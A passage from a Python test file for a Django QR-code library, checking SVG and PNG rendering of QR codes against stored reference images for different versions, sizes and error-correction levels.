10.8 48.6 L 12.6 48.6 L 12.6 46.8 z M 54 27 L 54 28.8 L 55.8 28.8 L 55.8 27 z M 61.2 30.6 L 61.2 32.4 L 63.0 32.4 L 63.0 30.6 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 7.2 64.8 L 7.2 66.6 L 9.0 66.6 L 9.0 64.8 z M 59.4 21.6 L 59.4 23.4 L 61.2 23.4 L 61.2 21.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 61.2 48.6 L 61.2 50.4 L 63.0 50.4 L 63.0 48.6 z M 41.4 32.4 L 41.4 34.2 L 43.2 34.2 L 43.2 32.4 z M 63 46.8 L 63 48.6 L 64.8 48.6 L 64.8 46.8 z M 43.2 23.4 L 43.2 25.2 L 45.0 25.2 L 45.0 23.4 z M 21.6 34.2 L 21.6 36.0 L 23.4 36.0 L 23.4 34.2 z M 23.4 32.4 L 23.4 34.2 L 25.2 34.2 L 25.2 32.4 z M 48.6 25.2 L 48.6 27.0 L 50.4 27.0 L 50.4 25.2 z M 25.2 30.6 L 25.2 32.4 L 27.0 32.4 L 27.0 30.6 z M 27 7.2 L 27 9.0 L 28.8 9.0 L 28.8 7.2 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 50.4 50.4 L 50.4 52.2 L 52.2 52.2 L 52.2 50.4 z M 32.4 34.2 L 32.4 36.0 L 34.2 36.0 L 34.2 34.2 z M 25.2 48.6 L 25.2 50.4 L 27.0 50.4 L 27.0 48.6 z M 10.8 37.8 L 10.8 39.6 L 12.6 39.6 L 12.6 37.8 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 12.6 28.8 L 12.6 30.6 L 14.4 30.6 L 14.4 28.8 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 57.6 57.6 L 57.6 59.4 L 59.4 59.4 L 59.4 57.6 z M 10.8 27 L 10.8 28.8 L 12.6 28.8 L 12.6 27 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 14.4 45 L 14.4 46.8 L 16.2 46.8 L 16.2 45 z M 19.8 21.6 L 19.8 23.4 L 21.6 23.4 L 21.6 21.6 z M 46.8 64.8 L 46.8 66.6 L 48.6 66.6 L 48.6 64.8 z M 43.2 36 L 43.2 37.8 L 45.0 
37.8 L 45.0 36 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 61.2 64.8 L 61.2 66.6 L 63.0 66.6 L 63.0 64.8 z M 37.8 59.4 L 37.8 61.2 L 39.6 61.2 L 39.6 59.4 z M 46.8 54 L 46.8 55.8 L 48.6 55.8 L 48.6 54 z M 21.6 57.6 L 21.6 59.4 L 23.4 59.4 L 23.4 57.6 z M 64.8 23.4 L 64.8 25.2 L 66.6 25.2 L 66.6 23.4 z M 28.8 10.8 L 28.8 12.6 L 30.6 12.6 L 30.6 10.8 z M 25.2 61.2 L 25.2 63.0 L 27.0 63.0 L 27.0 61.2 z M 34.2 48.6 L 34.2 50.4 L 36.0 50.4 L 36.0 48.6 z M 54 59.4 L 54 61.2 L 55.8 61.2 L 55.8 59.4 z M 7.2 50.4 L 7.2 52.2 L 9.0 52.2 L 9.0 50.4 z M 28.8 50.4 L 28.8 52.2 L 30.6 52.2 L 30.6 50.4 z M 55.8 36 L 55.8 37.8 L 57.6 37.8 L 57.6 36 z M 57.6 55.8 L 57.6 57.6 L 59.4 57.6 L 59.4 55.8 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 59.4 54 L 59.4 55.8 L 61.2 55.8 L 61.2 54 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 14.4 57.6 L 14.4 59.4 L 16.2 59.4 L 16.2 57.6 z M 41.4 57.6 L 41.4 59.4 L 43.2 59.4 L 43.2 57.6 z M 16.2 37.8 L 16.2 39.6 L 18.0 39.6 L 18.0 37.8 z M 43.2 63 L 43.2 64.8 L 45.0 64.8 L 45.0 63 z M 36 48.6 L 36 50.4 L 37.8 50.4 L 37.8 48.6 z M 18 61.2 L 18 63.0 L 19.8 63.0 L 19.8 61.2 z M 41.4 10.8 L 41.4 12.6 L 43.2 12.6 L 43.2 10.8 z M 37.8 46.8 L 37.8 48.6 L 39.6 48.6 L 39.6 46.8 z M 46.8 59.4 L 46.8 61.2 L 48.6 61.2 L 48.6 59.4 z M 39.6 45 L 39.6 46.8 L 41.4 46.8 L 41.4 45 z M 21.6 12.6 L 21.6 14.4 L 23.4 14.4 L 23.4 12.6 z M 64.8 7.2 L 64.8 9.0 L 66.6 9.0 L 66.6 7.2 z M 23.4 10.8 L 23.4 12.6 L 25.2 12.6 L 25.2 10.8 z M 32.4 52.2 L 32.4 54.0 L 34.2 54.0 L 34.2 52.2 z M 25.2 52.2 L 25.2 54.0 L 27.0 54.0 L 27.0 52.2 z M 7.2 63 L 7.2 64.8 L 9.0 64.8 L 9.0 63 z M 50.4 28.8 L 50.4 30.6 L 52.2 30.6 L 52.2 28.8 z M 32.4 12.6 L 32.4 14.4 L 34.2 14.4 L 34.2 12.6 z M 52.2 23.4 L 52.2 25.2 L 54.0 25.2 L 54.0 23.4 z M 57.6 39.6 L 57.6 41.4 L 59.4 41.4 L 59.4 39.6 z M 10.8 59.4 L 10.8 61.2 L 12.6 61.2 L 12.6 59.4 z M 54 32.4 L 54 34.2 L 55.8 34.2 L 55.8 32.4 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 55.8 34.2 L 55.8 36.0 L 57.6 36.0 L 57.6 34.2 z M 34.2 64.8 L 34.2 66.6 L 36.0 66.6 L 36.0 64.8 z M 57.6 21.6 L 57.6 23.4 L 59.4 23.4 L 59.4 21.6 z M 63 30.6 L 63 32.4 L 64.8 32.4 L 64.8 30.6 z M 16.2 54 L 16.2 55.8 L 18.0 55.8 L 18.0 54 z M 36 32.4 L 36 34.2 L 37.8 34.2 L 37.8 32.4 z M 46.8 43.2 L 46.8 45.0 L 48.6 45.0 L 48.6 43.2 z M 43.2 28.8 L 43.2 30.6 L 45.0 30.6 L 45.0 28.8 z M 39.6 28.8 L 39.6 30.6 L 41.4 30.6 L 41.4 28.8 z M 48.6 37.8 L 48.6 39.6 L 50.4 39.6 L 50.4 37.8 z M 45 9 L 45 10.8 L 46.8 10.8 L 46.8 9 z M 21.6 25.2 L 21.6 27.0 L 23.4 27.0 L 23.4 25.2 z M 25.2 7.2 L 25.2 9.0 L 27.0 9.0 L 27.0 7.2 z M 21.6 36 L 21.6 37.8 L 23.4 37.8 L 23.4 36 z M 27 30.6 L 27 32.4 L 28.8 32.4 L 28.8 30.6 z M 50.4 41.4 L 50.4 43.2 L 52.2 43.2 L 52.2 41.4 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 7.2 28.8 L 7.2 30.6 L 9.0 30.6 L 9.0 28.8 z M 12.6 23.4 L 12.6 25.2 L 14.4 25.2 L 14.4 23.4 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 10.8 32.4 L 10.8 34.2 L 12.6 34.2 L 12.6 32.4 z M 63 25.2 L 63 27.0 L 64.8 27.0 L 64.8 25.2 z M 59.4 18 L 59.4 19.8 L 61.2 19.8 L 61.2 18 z M 36 16.2 L 36 18.0 L 37.8 18.0 L 37.8 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 37.8 7.2 L 37.8 9.0 L 39.6 9.0 L 39.6 7.2 z M 63 36 L 63 37.8 L 64.8 37.8 L 64.8 36 z M 59.4 64.8 L 59.4 66.6 L 61.2 66.6 L 61.2 64.8 z M 39.6 19.8 L 39.6 21.6 L 41.4 21.6 L 41.4 19.8 z M 36 55.8 L 36 57.6 L 37.8 57.6 L 37.8 55.8 z M 45 25.2 L 45 27.0 L 46.8 27.0 L 46.8 25.2 z M 37.8 54 L 37.8 55.8 L 39.6 55.8 L 39.6 54 z M 46.8 9 L 46.8 10.8 L 48.6 10.8 L 48.6 9 z M 27 10.8 L 27 12.6 L 28.8 12.6 L 
28.8 10.8 z M 50.4 54 L 50.4 55.8 L 52.2 55.8 L 52.2 54 z M 30.6 21.6 L 30.6 23.4 L 32.4 23.4 L 32.4 21.6 z M 27 50.4 L 27 52.2 L 28.8 52.2 L 28.8 50.4 z M 54 36 L 54 37.8 L 55.8 37.8 L 55.8 36 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 57.6 61.2 L 57.6 63.0 L 59.4 63.0 L 59.4 61.2 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 59.4 63 L 59.4 64.8 L 61.2 64.8 L 61.2 63 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 14.4 48.6 L 14.4 50.4 L 16.2 50.4 L 16.2 48.6 z M 41.4 52.2 L 41.4 54.0 L 43.2 54.0 L 43.2 52.2 z M 63 52.2 L 63 54.0 L 64.8 54.0 L 64.8 52.2 z M 16.2 46.8 L 16.2 48.6 L 18.0 48.6 L 18.0 46.8 z M 36 39.6 L 36 41.4 L 37.8 41.4 L 37.8 39.6 z M 64.8 45 L 64.8 46.8 L 66.6 46.8 L 66.6 45 z M 39.6 50.4 L 39.6 52.2 L 41.4 52.2 L 41.4 50.4 z M 64.8 27 L 64.8 28.8 L 66.6 28.8 L 66.6 27 z M 23.4 63 L 23.4 64.8 L 25.2 64.8 L 25.2 63 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 52.2 57.6 L 52.2 59.4 L 54.0 59.4 L 54.0 57.6 z M 27 37.8 L 27 39.6 L 28.8 39.6 L 28.8 37.8 z M 7.2 54 L 7.2 55.8 L 9.0 55.8 L 9.0 54 z M 55.8 39.6 L 55.8 41.4 L 57.6 41.4 L 57.6 39.6 z M 30.6 55.8 L 30.6 57.6 L 32.4 57.6 L 32.4 55.8 z M 57.6 45 L 57.6 46.8 L 59.4 46.8 L 59.4 45 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z M 54 16.2 L 54 18.0 L 55.8 18.0 L 55.8 16.2 z M 32.4 64.8 L 32.4 66.6 L 34.2 66.6 L 34.2 64.8 z M 12.6 59.4 L 12.6 61.2 L 14.4 61.2 L 14.4 59.4 z M 55.8 21.6 L 55.8 23.4 L 57.6 23.4 L 57.6 21.6 z M 14.4 61.2 L 14.4 63.0 L 16.2 63.0 L 16.2 61.2 z M 41.4 61.2 L 41.4 63.0 L 43.2 63.0 L 43.2 61.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
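# Expected SVG output for each entry of `versions`: the first ten values fall back to the default rendering, the last four map to the version 2 and version 4 references.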
results = [default_result] * 10 + [
result_version_2,
result_version_2,
result_version_4,
result_version_4
]
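# Every call style below (embedded QR code, tag defaults, explicit and upper-case image_format, QRCodeOptions) must produce the same SVG as the stored reference.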
for version, result in zip(versions, results):
print('Testing SVG with version %s' % version)
qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(version=version))
qr2 = qr_from_text(TEST_TEXT, version=version)
qr3 = qr_from_text(TEST_TEXT, version=version, image_format='svg')
qr4 = qr_from_text(TEST_TEXT, version=version, image_format='SVG')
qr5 = qr_from_text(TEST_TEXT, options=QRCodeOptions(version=version, image_format='SVG'))
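# An unrecognized image format is expected to fall back to the default (SVG) output, hence qr6 must equal the other renderings.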
qr6 = qr_from_text(TEST_TEXT, version=version, image_format='invalid-format-name')
self.assertEqual(qr1, qr2)
self.assertEqual(qr1, qr3)
self.assertEqual(qr1, qr4)
self.assertEqual(qr1, qr5)
self.assertEqual(qr1, qr6)
self.assertEqual(qr1, result)
# print("\"\"\"%s\"\"\"," % qr1)
# print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_error_correction(self):
file_base_name = 'qrfromtextsvgresult_error_correction'
tests_data = []
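# Build one test case per error correction level: the rendered tag must match the reference SVG file stored for that level.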
for correction_level in ERROR_CORRECTION_DICT:
ref_file_name = '%s_%s%s' % (file_base_name, correction_level, SVG_REF_SUFFIX)
tests_data.append(dict(source='{% qr_from_text "' + COMPLEX_TEST_TEXT + '" image_format="svg" error_correction="' + correction_level + '" %}', ref_file_name=ref_file_name.lower()))
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
html_source = mark_safe('{% load qr_code %}' + test_data['source'])
template = Template(html_source)
context = Context()
source_image_data = template.render(context).strip()
# Debug code for updating reference file.
# write_svg_content_to_file(test_data['ref_file_name'], source_image_data)
ref_image_data = get_svg_content_from_file_name(test_data['ref_file_name'], skip_header=False)
self.assertEqual(source_image_data, ref_image_data)
class TestQRFromTextPngResult(SimpleTestCase):
"""
Ensures that the QR codes produced in PNG format match the verified references.
The tests cover direct calls to the tag function, template rendering of the tag, and direct calls to the qr_code API.
"""
def test_size(self):
sizes = ['t', 'T', 's', 'S', None, -1, 0, 'm', 'M', 'l', 'L', 'h', 'H', '6', 6, '8', 8, 10, '10']
rt = """iVBORw0KGgoAAAANSUhEUgAAAK4AAACuAQAAAACHdwtDAAABBklEQVR4nO2XMU5EMQxEn9eRKPNv5H81bvb3KHsApKRE8mooskDBStCAC9ZVNI2fovE4MXGnrqd7Kjzk/yojLadEggaAS1kE6JIGPqIRN7Cqq5rWoPXnBLO9kuRW8fct78vTWjlJV8J1C0A6CkmuZrbhAzibWRGJfaS9geftXJX2bZrZngTT6manATnxPLuwDaBlXcb2w0dIR66krclYJLkkKYnsgigkSSIJIIkFVkWyii6XsqvoTk6A2ZodmLtfqvLk3ScjAPqRZT5pAHPzF+ijXTbpXDTFn0uPub82rI/85Zbfy/140qHL/octv8hdCWsdr5itfccCPsJ1FDnWHj+vh/wD+Q2xAZu1VAND1QAAAABJRU5ErkJggg==" """
rs = """iVBORw0KGgoAAAANSUhEUgAAAVwAAAFcAQAAAACsbTuBAAABbklEQVR4nO3aQY4DIQwEwO5V7vD/3+UH8ALvAcIAYaVopSGWaE4TVAcfLIdphoaPV/753ALCwsLCwsLCwgNmWxHIJDlvbilD2CMOVlZ5RjDGcXNPGcIucZsPjLAnLQ2b28oQ9o7D8tXWd83CW/A4Lr5WhvBX8aM9XZMiEyFx2ry3DGHHONc3EqD7Q+k395Qh7AjXuTHMh0xkzpv3liHsFzOiRRmW6ugYw40dZQh7wjAbkg1LGDONGneYmSUnNQvvwVcn1HFR26D+LClH7R71xln41RuvCLQ0RhsgwJWOqjcOw5j6ob2k1J2+c9QbZ2G+B6AEDGBIAJBjl3s4qVl4K+6vXMsZA0C5blO+cSqezxv9Tcp1ItV542zcRxmlSeo1/VPfb5yJH8tdhmSZKGePoO83zsTr3jCAwcpBtB5K7y1D2CFe3MNajgCQacE4YCc1C+/Bq4S8PZSYNCkXPRMv8o0/l/INYWFhYWFh4f/gX5HE6vc486ONAAAAAElFTkSuQmCC" """
rm = """iVBORw0KGgoAAAANSUhEUgAAAgoAAAIKAQAAAABqulr4AAACO0lEQVR4nO3cQW6kMBCF4VfjlmbJ3GCOAkeHo+QGsIwEqiyMwZA0MBM6tNR/rWiTfCo2likXNtc3o/n1XUGCgICAgICAgICAgICAgICAgID4X8KWcZOkJl5LUre6Xz0mCwgICIjjROlTtGmkVXCPc1SYb/s94oQsICAgII4T3WIdZVap8Hcz9zqNTMuwB2YBAQEBcT9uu38R9nojnuNBICAgICStV19XZQEBAQGRYrnWKlbrqsak0MvS7y+XXc/xIBAQEC9INPMO4Z84UqayvCQN2Q7iA7OAgICA2Ip5rfXVOqoxaYhT1HoZdmoWEBAQEP9OmFV5U9ZNiluHIfY5LG89LAsICAiInfA82jhWunuf3Vr9S3DPmrvq53gQCAiIlyPMzP56H3909jtNVkPq1wru8WLIOrjOzgICAgJiO/K3vbKeurPGKlZTzSOtNG4mhv7sLCAgICCORl6NH/scxskqNTwMJpfUWejnir2prE/MAgICAuJw+P2QpCJezFWsOJIFdS0ICIhriM9nPuTFK3Vx67D0N/q1ICAgLiTyjcLFmQ9htXVYxF3FWsvDH1hrQUBAXEl8/upwekN8S2st93fO14KAgLiM2DvzYSzCN/Gd0CQV7eoUiOd4EAgIiBch9matseGhdGm4zZuJJ2cBAQEBcTS2znxwNdV42VjRBteiCn9iFhAQEBCHY/OznSnKVJ9ff+xDNR4CAuJnia0zHxYjhU8j1LUgICAgICAgICAgICAgICAgIK4mPgAhWy686mP48AAAAABJRU5ErkJggg==" """
rl = """iVBORw0KGgoAAAANSUhEUgAAA2YAAANmAQAAAAC5rqVTAAADVklEQVR4nO3dzW6jMBQGUHuoNEvyRsyjp4/SN2iWlYI8i5jwZ9I003QIOXcVKOao3n3Cvo4p/Fy1v34QC4FGo9FoNBqNRqPRaDQajUaj0Wg0Go1Go9FoNBqNRqPRaDQajUaj0Wg0Go1G+/ZK41p+sDk9cJyPfV8cU41fftzyTNJoNBqNRqPRaLSVapNgMkkxVb5sUkoxxpd8u5kPuk67Y9FoNBqNRqPRaLTn017Ktw+7889q8OUmni7rFMJrDGESY2L/s9kXX7vlmaTRaDQajUaj0Whr0BYyzufV3NJ0esszSaPRaDQajUaj0R5WO8RzfS0jPcD/RqPRaDQajUaj0R5aW8go9eJXmjavSGv2o8VpIcyWrhVqyzNJo9FoNBqNRqPR1qAVMk4b5/f6qo6j3TpdvV4c1NWWZ5JGo9FoNBqNRqOtQYtf2lYzDzLDjgSfVrvlmaTRaDQajUaj0Whr1PIWm8GOm67+hBAG5+M0fXfohYev0O5bNBqNRqPRaDQa7fm06Vq1+Wed7ktNbhZdjZ+4sLAtzr/ybHkmaTQajUaj0Wg02hq0UD64s04p7U8/h4d+DmofZp91BpeFN6eUjlueSRqNRqPRaDQajbYGrZBxqnk4GeaUPG4QaupxPhr8Vcah0Wg0Go1Go9Fo/zfjLH+aacYpJo+dPHw5Lsk4NBqNRqPRaDQa7c51U1+1+v18Odlx0770f52Xvmo0Go1Go9FoNBrth7V5i7SFvmqDOvSN1KqU0lsecIV236LRaDQajUaj0WjPpxXOAC0cedMd+plzy6HPL20MoU7nrmttfl+zL2pbnkkajUaj0Wg0Go22Bq2QcULoQ00oRp7JWrVB5Ok6S7/G4tgtzySNRqPRaDQajUZ7WO3QL137iDHu8u28Rm0Xiq2kb9ZuLhqNRqPRaDQajUa7qup0Oh8nxvg7t0zbh3OLtrd+e863aDcXjUaj0Wg0Go1Gez5tYa1aXW63Nthxk6uNp6VrTTrv1rlQW55JGo1Go9FoNBqNtgatkHHa5awy7znQ7cfJTQa6DTi5BcG0tjyTNBqNRqPRaDQabQ3a187H+cdyPg6NRqPRaDQajUaj0Wg0Go1Go9FoNBqNRqPRaDQajUaj0Wg0Go1Go9FoNBrtwbW/A9OtzDU2mrIAAAAASUVORK5CYII=" """
rh = """iVBORw0KGgoAAAANSUhEUgAABXAAAAVwAQAAAADN9EoDAAAG9klEQVR4nO3dwarbMBRAwefS//9ld+GNwMhR0h5SwcwiGDtRDlpf5OP82cmvbwe8R25JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5Jbun37MGxvMT5+KvnpytrjjbbXbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluaXpPMNlNldwmU0vHJPrz9Ycbba7cktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktySy/mGS7Ppy6M3zmHz/skw7tr3m22u3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktL8wyfWZlPeNdmuyu3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLeUzDN8dvbCis12V25JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbmlpnmF9GmGcZDhvdz5bc7TZ7sotyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS29mGeYTSPMPM8wfLbmaLPdlVuSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSWzr+1ZsgnqcUvG9iB3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLm+VOz2e45hNWzls4J9+83/n7mYfNdlduSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5pOs/wPF0wPh0nH2a/Wn/HxLja3Wa7K7cktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLckt/TifIbL7JSG59mD2QkP91mIldUum+2u3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLc0nSe4XJOrmd3ZnML9zv36Qjvm/g2uSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluaXNco/nKYKVcxVmpzfMnq78o/dNfIPcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLc0ma5L+YZ3lhouL5PPqy8k2LFZrsrtyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3NH3fxOy8hbtz+Hz+1X164d3TGzbbXbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluaXpPMNl/W0Us+vxzjm5Xvmvy2a7K7cktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLckt/RinuFyn094nj2YvW/ieZ2V2YbNdlduSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5paZ7hXeMMw2yS4T694HyGb5NbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5Jb2iw3mWeYnc+wfmdms92VW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbWppnWJk0mJ3D8DPcfz6xYcVmuyu3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLf0Yp5hfergmFxfxhmG83b/Z/L0brPdlVuSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSW5JbkluSWzpWzl74f2y2u3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLcktyS3JLckt/AI2oXvO88XOVAAAAAElFTkSuQmCC" """
r6 = rt
r8 = """iVBORw0KGgoAAAANSUhEUgAAAOgAAADoAQAAAADN0pXVAAABBElEQVR4nO2YwRKDIAxE33b8/1/eHgJUe/BQEDMWD2jmHdwdIkmUObleZ3DRRRe9mW4AimejskSUVXO3XwwgsCy3KKvmfr+xsciWW3SjqnnUp/S6986i2zHU0XFOzQP8FpPCYmc5p+Z+v+VIDrctyqq5h2qfvoK/yGfFvtrC2rvOqbmbGopbt2x+aP19ASiqbl3smueJNf9Ia3/laDji/uB+Q6V5dKtFKv3kM/vnr/PZn6y+U9Wk+aiUX7dNzql52HwkBLKq3aSah81H4KjFjpMrqeaBNA4tRSVOo+o6amTXDzmNqoH0MB9ZxNB/t6pJ85HKP51alpJqHlZ/J7530UUX7advq/JW1h0TisgAAAAASUVORK5CYII=" """
r10 = """iVBORw0KGgoAAAANSUhEUgAAASIAAAEiAQAAAAB1xeIbAAABeklEQVR4nO2ZS46DMBBEXw9IszQ3mKOYo8NRcgO8jERUszC/TBaTjQOC9grQkyg17aYoTPy/+q83IHDKKaeccurolE2rht7MIM1X2l11XYKKkqQBiEMla6kkSXqmPq/rElSaetzacDd1QN4Ge+u6GFW92s5D6LoAlZYp/6k7XpWax0oQkIC+qUYD2Hb/UdWfgurNzKwB4gDAI9ucvXWdmsp9v+nxvsGmbbCnrutQ1qbJ36uj0uzv3ecUpcg+Plt7jWxdPZWy8e+Oqv4MlNnPCKRvAQ9TRyV1+WhPXeempkaPmlcue5Bg/rj1vi9Dsa34/FmVT9eH4rUvQqHnBWGpeFj2wlHVn4Fac8xpwKca4s39fVHqad4PS5QTxs3g8b4vS60pTpCItxqi7p7fl6TqlyupHtU3YITB8/uS1Gvtw4BFPWqR6nE3XVeigqQOpndt31TK0dreus5MvYQIQP5xuEYM/q4tQ/3NMeejEW3+YB1VvVNOOeWUU+9Sv6Lp54yG/greAAAAAElFTkSuQmCC" """
results = [rt] * 2 + [rs] * 2 + [rm] * 5 + [rl] * 2 + [rh] * 2 + [r6] * 2 + [r8] * 2 + [r10] * 2
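# Parallel to `sizes`: t/T and s/S share a reference each, None/-1/0 fall back to the same output as m/M, l/L and h/H share theirs, and the numeric sizes 6, 8 and 10 (as int or str) close the list.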
for size, result in zip(sizes, results):
print('Testing PNG with size %s' % size)
qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(size=size, image_format='png'))
qr2 = qr_from_text(TEST_TEXT, size=size, image_format='png')
qr3 = qr_from_text(TEST_TEXT, options=QRCodeOptions(size=size, image_format='png'))
self.assertEqual(qr1, qr2)
self.assertEqual(qr1, qr3)
self.assertEqual(qr1, BASE64_PNG_IMAGE_TEMPLATE % result)
# print("\"\"\"%s\"\"\"," % qr1)
# print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_version(self):
versions = [None, -1, 0, 41, '-1', '0', '41', 'blabla', 1, '1', 2, '2', 4, '4']
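# None, negative, zero, out-of-range (41) and non-numeric values fall back to the default rendering, which for this text equals version 1; versions 2 and 4 (as int or str) get dedicated references.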
default_result = """iVBORw0KGgoAAAANSUhEUgAAAgoAAAIKAQAAAABqulr4AAACO0lEQVR4nO3cQW6kMBCF4VfjlmbJ3GCOAkeHo+QGsIwEqiyMwZA0MBM6tNR/rWiTfCo2likXNtc3o/n1XUGCgICAgICAgICAgICAgICAgID4X8KWcZOkJl5LUre6Xz0mCwgICIjjROlTtGmkVXCPc1SYb/s94oQsICAgII4T3WIdZVap8Hcz9zqNTMuwB2YBAQEBcT9uu38R9nojnuNBICAgICStV19XZQEBAQGRYrnWKlbrqsak0MvS7y+XXc/xIBAQEC9INPMO4Z84UqayvCQN2Q7iA7OAgICA2Ip5rfXVOqoxaYhT1HoZdmoWEBAQEP9OmFV5U9ZNiluHIfY5LG89LAsICAiInfA82jhWunuf3Vr9S3DPmrvq53gQCAiIlyPMzP56H3909jtNVkPq1wru8WLIOrjOzgICAgJiO/K3vbKeurPGKlZTzSOtNG4mhv7sLCAgICCORl6NH/scxskqNTwMJpfUWejnir2prE/MAgICAuJw+P2QpCJezFWsOJIFdS0ICIhriM9nPuTFK3Vx67D0N/q1ICAgLiTyjcLFmQ9htXVYxF3FWsvDH1hrQUBAXEl8/upwekN8S2st93fO14KAgLiM2DvzYSzCN/Gd0CQV7eoUiOd4EAgIiBch9matseGhdGm4zZuJJ2cBAQEBcTS2znxwNdV42VjRBteiCn9iFhAQEBCHY/OznSnKVJ9ff+xDNR4CAuJnia0zHxYjhU8j1LUgICAgICAgICAgICAgICAgIK4mPgAhWy686mP48AAAAABJRU5ErkJggg==" """
result_version_2 = """iVBORw0KGgoAAAANSUhEUgAAAlIAAAJSAQAAAAAgpBbeAAADC0lEQVR4nO3dQZLbIBCF4deRqmYp3yBHkY9ujjI3sPZWdRaABPbYk6RsWSQ/K4+k+Qo2FDQNmOtZJfx4GiVhYWFhYWFhYWFhYWFhYWFhYWFhYbVjWV16yeyYX4b4UJKmqw+PX1jPrBcWFhZWW1Zf/B5Py8/pIMnzD2l0ac7fdpf1f+xF9cLCwsL6N6ypGoKaHTW4u0vBDup8zR1YxrTb1AsLCwurHat/8M4VbDjPvWJ/OveqxrQvrRcWFhZWq9ajflUafbKHH1Rlr23EwsLC2tKq+9Wh2iVg+UnsWztfo6lf7ibYaxuxsLCw3mWFdZH/EJ+M/hmDqKOf1+/mIhtgi3phYWFhtWSt49XbIWgKq5qkYIOnJ8Pdna97bSMWFhbWeyyzo6a8xD/FsWiwn74kVc05VWDOiax1jmsDbcTCwsLa1gpx+m9mZXcqyd39nPOsUt8bcqzg9fXCwsLCatNyP2nwS+xFP+3DPYZVu5i/umSrDlWX+/p6YWFhYbVl3cmzKtIAJLlGnw5z/ruLEdbhPFsVld1rG7GwsLDeZy1zfLM+Dlw9jk7Tfiv30xqDlTp34qtYWFhY962UTBW3r17yStaHXycAlOtWW9QLCwsLqyVr7RrjLoA0tZ+su6Ssqtnk8dyVPOvv7gRY99pGLCwsrC2tNNlfyuVqAeucp/9D9Y2k8om7u5/22kYsLCysLa16vLpsVk3HAoTj4Mty1XyzxrUcyfL8emFhYWG1al2PV8siKZ8TOOYn4/pKcSjLeBULCwvra+v2voDifIDqvoD0yvPa1mvrhYWFhdWW9